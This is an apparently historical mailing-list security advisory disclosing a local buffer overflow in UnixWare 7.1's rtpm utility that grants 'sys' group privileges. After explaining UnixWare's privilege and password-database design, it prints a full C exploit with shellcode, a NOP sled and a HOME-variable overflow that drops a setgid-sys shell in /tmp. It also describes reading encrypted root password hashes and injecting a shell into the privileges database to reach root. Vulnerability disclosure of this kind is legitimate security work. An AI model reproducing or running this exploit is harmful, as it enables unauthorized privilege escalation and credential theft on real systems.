|
Greetings, OVERVIEW Any local users can exploit a bug in rtpm to gain "sys" privileges. A root compromise is then trivial. BACKGROUND As usual, I've only tested UnixWare 7.1, all others should be assumed vulnerable. UnixWare has a slightly different system of managing the password database than Linux/BSD/Solaris and the like. In addition to the conventional /etc/passwd and /etc/shadow, UnixWare keeps a copy of these files (including encrypted passwords) in /etc/security/ia/master and /etc/security/ia/omaster. These are binary files containing the same information as /etc/passwd and /etc/shadow in a different format. Various UW C functions can be used to access this information. Some programs use this file for authentication purposes, instead of /etc/shadow, such as the i2odialog daemon. The only major security problem I've found with this is that group "sys" is able to read from this database. If there were no programs setgid sys, this would not be a problem, however UnixWare's owner/group scheme relies very heavily on this group. /dev/*mem* is readable by sys (instead of having a seperate kmem group) and many key directories, such as /sbin, and critical binaries are writable by this group. The /etc/security/tcb/privs database (which controls which non-suid/sgid programs gain additional privileges) is also writable by sys. As a consequence, many programs which need to access /dev/kmem and various other config files are sgid sys instead of sgid/suid to a more specialized group. Once we have exploited one of these programs to gain the gid of sys, we have nearly full control over the system. I suppose that the argument can be made that the gain of any extra privileges will allow someone to gain root, given enough time, but UW seems to have given privileges so close to root that they might as well BE root. The encrypted passwords for the system should NEVER be readable by anyone other than root (and *maybe* the "shadow" group, whose sole purpose is authentication). All this makes me think more about the slightly skewed but good intentioned UnixWare scheme of privileges. I think it's a great idea to have a program like ping only gain "driver" privileges (where it can only access devices with elevated privileges). Although there were/are some growing pains migrating to this system, it will probably end up replacing 75% of the s-bits on a UnixWare system. Naturally some programs will need full root privileges to operate correctly, but for those specialized programs that only really need to accomplish one task, it's perfect. All that being said, I wonder if any of the open source OS's like linux and bsd are considering migrating to this type of system, or at least making it an option or patch. DETAILS A simple buffer overflow in /usr/sbin/rtpm will allow us to gain sys privileges. From there, you can strings(1) the /etc/security/ia/master file for the encrypted root password or inject a shell into the /etc/security/tcb/privs file. Either of these will lead to a fairly quick root compromise. EXPLOIT A small warning about this exploit. rtpm is one of those ascii gui programs that messes with your term. If it doesn't exit normally, it will leave you with a mostly unusable session. For this reason, this exploit will drop /tmp/ksh as sgid-sys and exit. After you run the exploit, you'll probably need to forcefully logout (exit might not work) then log back in to get your privs. The default offset should work, but if it doesn't you should write a script to change it rather than deal with logging out/in every time you want to change your offset. /** ** uwrtpm.c - UnixWare 7.1 rtpm exploit ** ** ** Drops a setgid sys shell in /tmp/ksh. We can't exec a shell because ** rtpm screws up our terminal when it exits abnormally. After running ** this exploit, you must forcefully exit your shell and re-login to exec ** your sys shell. ** ** cc -o uwrtpm uwrtpm.c; ./rtpm <offset> ** use offsets of +-100 ** ** Brock Tellier btellier@usa.net ** **/ #include <stdlib.h> #include <stdio.h> char scoshell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/rt\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define ALIGN 3 #define LEN 1100 #define NOP 0x90 #define SYSSHELL "void main() {setregid(3,3);system(\"cp /bin/ksh \ /tmp/ksh; chgrp sys /tmp/ksh; chmod 2555 /tmp/ksh\"); } " void buildrt() { FILE *fp; char cc[100]; fp = fopen("/tmp/rt.c", "w"); fprintf(fp, SYSSHELL); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/rt /tmp/rt.c"); system(cc); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=0; buflen=1100; } buildrt(); addr=0x8046a01 + offset; fprintf(stderr, "\nUnixWare 7.1 rtpm exploit drops a setgid sys shell "); fprintf(stderr, "in /tmp/ksh\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+ALIGN;i<buflen-4;i+=4) *(int *)&buf[i]=addr; memcpy(buf, "HOME=", 5); buf[buflen - 1] = 0; putenv(buf); execl("/usr/sbin/rtpm", "rtpm", NULL); exit(0); } Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1